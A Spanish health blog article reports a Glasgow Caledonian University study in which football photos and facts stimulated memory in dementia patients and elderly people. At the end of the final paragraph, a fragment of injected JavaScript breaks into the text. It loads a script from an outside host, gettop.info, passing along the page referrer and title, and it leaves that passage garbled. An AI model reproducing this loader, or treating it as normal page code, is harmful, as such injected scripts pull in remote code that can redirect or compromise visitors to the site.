Salud y belleza » Salud

El fútbol y la estimulación de la memoria

Sin Comentarios

A diferencia de lo que ocurre con los deportes -éstos, para el español medio, se dividen en dos: el fútbol y el resto- la memoria puede fraccionarse en mucho más que un simple binomio de piezas. La memoria, en efecto, está conformada por un sinfín de espacios en blanco que el hombre, de acuerdo a sus recuerdos, van complentado de a poco.

Pero, volviendo sobre el fútbol y los deportes, suena interesante leer un informe realizado recientemente por profesionales de la Universidad Caledonian de Glasgow, en Escocia (Reino Unido): se comprobó que el fútbol ayuda a estimular la memoria. Cualquier desprevenido podrá decir, desde ya, que el balonpié fomenta la memoria selectiva ayudando a recordar las victorias y olvidar las derrotas, pero el estudio efectuado por especialistas es mucho más amplio.

Ya no es una labor inútil conocer la formación completa de aquella selección española llamada la quinta del Buitre o poder recitar, de corrido, la lista de Pichichis y Zamoras de los últimos años: “se han realizado pruebas en pacientes con demencia a través de fotos relacionadas con el fútbol. Los resultados arrojados fueron sumamente satisfactorios. Cada paciente recordó mucho de lo visto, su memoria sufrió una activación. Se llegó a la conclusión de que esto ocurrió por la utilización de pasiones como, obviamente, el fútbol” aseguró uno de los científicos, el profesor Debbie Tolson, y agregó que “percibimos claramente un mejoramiento también en los ancianos, quizás por la combinación de elementos de memoria que reúne un deporte como el fútbol, hablamos de números y estadísticas, reglas relacionadas con el juego en sí, nombres de futbolistas, los colores y la indumentaria y muchos otros aspectos que sirven de forma estupenda para espolear la memoria de personas afectadas, ya sea por patologías, o por problemas relacionados con el lógico paso del tiempo”.

Desde la lógica más simple, el estudio, para cualquier individuo no familiarizado con la ciencia, puede ser captado de forma sencilla: probemos inquiriendo a cualquier sujeto sobre, digamos, el nombre de algún familiar medianamente cercano o su edad, y luego hagamos otra prueba preguntándole el nombre, apellido, apodo y dorsal de algún futbolista regular que haya vestido los colores de su equipo preferido.

Por el momento, aunque muchos tests hayan sido positivos e, incluso, se haya conseguido cierta cantidad de resultados empíricos, los estudios en general siguen siendo aún muy preliminares. Pero, si todo sigue así, en el futuro tanto Tolson como su equipo podrán combinar distintas técnicas para seguir trabajando y mejorar la memoria de los pacientes.

Estos resultados han despertado el interés de investigadores de otros países: investigadores norteamericanos han anunciado que van a usar el mismo método pero con otros deportes como el Baseball. ¿Servirá?} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.